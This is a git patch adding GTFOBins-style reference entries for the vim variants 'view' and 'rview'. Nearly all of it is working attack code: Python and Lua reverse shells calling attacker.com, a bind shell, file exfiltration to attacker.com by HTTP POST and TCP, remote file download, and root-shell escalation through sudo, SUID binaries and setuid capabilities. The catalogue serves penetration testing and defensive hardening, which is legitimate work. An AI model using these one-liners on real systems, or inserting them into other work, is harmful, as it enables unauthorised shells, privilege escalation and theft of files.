From 81fafc83f32abaa59faff915373da740d447c860 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 27 Sep 2020 11:45:49 +0200 Subject: [PATCH] Add view and rview Close #137. --- _gtfobins/rview.md | 119 ++++++++++++++++++++++++++++++++++++++++++ _gtfobins/view.md | 125 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 244 insertions(+) create mode 100644 _gtfobins/rview.md create mode 100644 _gtfobins/view.md diff --git a/_gtfobins/rview.md b/_gtfobins/rview.md new file mode 100644 index 0000000..27788a8 --- /dev/null +++ b/_gtfobins/rview.md @@ -0,0 +1,119 @@ +--- +functions: + shell: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. + code: rview -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' + - description: This requires that `rview` is compiled with Lua support. + code: rview -c ':lua os.execute("reset; exec sh")' + reverse-shell: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + rview -c ':py import vim,sys,socket,os,pty;s=socket.socket() + s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) + [os.dup2(s.fileno(),fd) for fd in (0,1,2)] + pty.spawn("/bin/sh") + vim.command(":q!")' + non-interactive-reverse-shell: + - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed. + code: | + export RHOST=attacker.com + export RPORT=12345 + rview -c ':lua local s=require("socket"); local t=assert(s.tcp()); + t:connect(os.getenv("RHOST"),os.getenv("RPORT")); + while true do + local r,x=t:receive();local f=assert(io.popen(r,"r")); + local b=assert(f:read("*a"));t:send(b); + end; + f:close();t:close();' + non-interactive-bind-shell: + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed. + code: | + export LPORT=12345 + rview -c ':lua local k=require("socket"); + local s=assert(k.bind("*",os.getenv("LPORT"))); + local c=s:accept(); + while true do + local r,x=c:receive();local f=assert(io.popen(r,"r")); + local b=assert(f:read("*a"));c:send(b); + end;c:close();f:close();' + file-upload: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + rview -c ':py import vim,sys; from os import environ as e + if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u + else: import urllib as u, urllib2 as r + r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode())) + vim.command(":q!")' + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + rview -c ':py import vim,sys; from os import environ as e + if sys.version_info.major == 3: import http.server as s, socketserver as ss + else: import SimpleHTTPServer as s, SocketServer as ss + ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever() + vim.command(":q!")' + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + rview -c ':lua local f=io.open(os.getenv("LFILE"), 'rb') + local d=f:read("*a") + io.close(f); + local s=require("socket"); + local t=assert(s.tcp()); + t:connect(os.getenv("RHOST"),os.getenv("RPORT")); + t:send(d); + t:close();' + file-download: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + rview -c ':py import vim,sys; from os import environ as e + if sys.version_info.major == 3: import urllib.request as r + else: import urllib as r + r.urlretrieve(e["URL"], e["LFILE"]) + vim.command(":q!")' + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `rview` is compiled with Lua support and that `lua-socket` is installed. + code: | + export LPORT=12345 + export LFILE=file_to_save + rview -c ':lua local k=require("socket"); + local s=assert(k.bind("*",os.getenv("LPORT"))); + local c=s:accept(); + local d,x=c:receive("*a"); + c:close(); + local f=io.open(os.getenv("LFILE"), "wb"); + f:write(d); + io.close(f);' + file-write: + - code: | + rview file_to_write + iDATA + ^[ + w! + file-read: + - code: rview file_to_read + library-load: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. + code: rview -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")' + suid: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. + code: ./rview -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' + sudo: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. + code: sudo rview -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' + - description: This requires that `rview` is compiled with Lua support. + code: sudo rview -c ':lua os.execute("reset; exec sh")' + capabilities: + - description: This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3. + code: ./rview -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' + limited-suid: + - description: This requires that `rview` is compiled with Lua support. + code: ./rview -c ':lua os.execute("reset; exec sh")' +--- diff --git a/_gtfobins/view.md b/_gtfobins/view.md new file mode 100644 index 0000000..e47ca2f --- /dev/null +++ b/_gtfobins/view.md @@ -0,0 +1,125 @@ +--- +functions: + shell: + - code: view -c ':!/bin/sh' + - code: | + view + :set shell=/bin/sh + :shell + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. + code: view -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' + - description: This requires that `view` is compiled with Lua support. + code: view -c ':lua os.execute("reset; exec sh")' + reverse-shell: + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + view -c ':py import vim,sys,socket,os,pty;s=socket.socket() + s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) + [os.dup2(s.fileno(),fd) for fd in (0,1,2)] + pty.spawn("/bin/sh") + vim.command(":q!")' + non-interactive-reverse-shell: + - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `view` is compiled with Lua support and that `lua-socket` is installed. + code: | + export RHOST=attacker.com + export RPORT=12345 + view -c ':lua local s=require("socket"); local t=assert(s.tcp()); + t:connect(os.getenv("RHOST"),os.getenv("RPORT")); + while true do + local r,x=t:receive();local f=assert(io.popen(r,"r")); + local b=assert(f:read("*a"));t:send(b); + end; + f:close();t:close();' + non-interactive-bind-shell: + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `view` is compiled with Lua support and that `lua-socket` is installed. + code: | + export LPORT=12345 + view -c ':lua local k=require("socket"); + local s=assert(k.bind("*",os.getenv("LPORT"))); + local c=s:accept(); + while true do + local r,x=c:receive();local f=assert(io.popen(r,"r")); + local b=assert(f:read("*a"));c:send(b); + end;c:close();f:close();' + file-upload: + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + view -c ':py import vim,sys; from os import environ as e + if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u + else: import urllib as u, urllib2 as r + r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode())) + vim.command(":q!")' + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + view -c ':py import vim,sys; from os import environ as e + if sys.version_info.major == 3: import http.server as s, socketserver as ss + else: import SimpleHTTPServer as s, SocketServer as ss + ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever() + vim.command(":q!")' + - description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `view` is compiled with Lua support and that `lua-socket` is installed. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + view -c ':lua local f=io.open(os.getenv("LFILE"), 'rb') + local d=f:read("*a") + io.close(f); + local s=require("socket"); + local t=assert(s.tcp()); + t:connect(os.getenv("RHOST"),os.getenv("RPORT")); + t:send(d); + t:close();' + file-download: + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + view -c ':py import vim,sys; from os import environ as e + if sys.version_info.major == 3: import urllib.request as r + else: import urllib as r + r.urlretrieve(e["URL"], e["LFILE"]) + vim.command(":q!")' + - description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `view` is compiled with Lua support and that `lua-socket` is installed. + code: | + export LPORT=12345 + export LFILE=file_to_save + view -c ':lua local k=require("socket"); + local s=assert(k.bind("*",os.getenv("LPORT"))); + local c=s:accept(); + local d,x=c:receive("*a"); + c:close(); + local f=io.open(os.getenv("LFILE"), "wb"); + f:write(d); + io.close(f);' + file-write: + - code: | + view file_to_write + iDATA + ^[ + w! + file-read: + - code: view file_to_read + library-load: + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. + code: view -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")' + suid: + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. + code: ./view -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' + sudo: + - code: sudo view -c ':!/bin/sh' + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. + code: sudo view -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' + - description: This requires that `view` is compiled with Lua support. + code: sudo view -c ':lua os.execute("reset; exec sh")' + capabilities: + - description: This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3. + code: ./view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' + limited-suid: + - description: This requires that `view` is compiled with Lua support. + code: ./view -c ':lua os.execute("reset; exec sh")' +---